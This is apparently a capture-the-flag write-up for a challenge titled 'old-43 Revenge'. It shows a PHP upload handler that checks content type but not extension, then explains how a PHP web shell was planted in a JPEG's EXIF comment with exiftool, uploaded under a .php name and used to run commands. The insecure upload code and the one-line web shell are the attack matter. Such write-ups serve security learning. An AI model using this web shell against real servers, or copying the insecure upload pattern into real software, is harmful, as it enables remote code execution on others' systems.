old-43 Revenge -- PHP In Image

<?php
if (isset($_FILES["file"])) {
    $type = $_FILES["file"]["type"];
    $name = $_FILES["file"]["name"];
    if (!$type) {
        exit("type not detected");
    }
    if (preg_match("/\.\.|\/|\\\|\.htaccess/", $name)) {
        exit("dont do that");
    }
    if (preg_match("/text\/|application\/octet-stream/i", $type)) {
        exit("wrong type");
    }
    $image = new Imagick();
    $image->readImage($_FILES["file"]["tmp_name"]);
    $image->resizeImage(500, 500, imagick::FILTER_GAUSSIAN, 10);
    $image->writeImage("./upload/" . $name);
    echo "Done!<br><br><a href=./upload/{$name}>./upload/{$name}</a>";
}
?>

We can upload file and via Imagick blur effect is applied. We are not restricted to extension upload, but content type which shouldn't cause an issue.

Use any image and attach some PHP code into it:

└─$ exiftool -Comment='<?php echo system($_REQUEST[0]);?>' usb.jpg
    1 image files updated

Upload the file with php extension:

Check shell access:

Get the flag:

Note: I thought this might have been ImageMagick Exploits, but it turned out much simpler.

Previousold-43 -- No Brainer Webshell Nextold-44 -- Command Injection

Last updated 4 days ago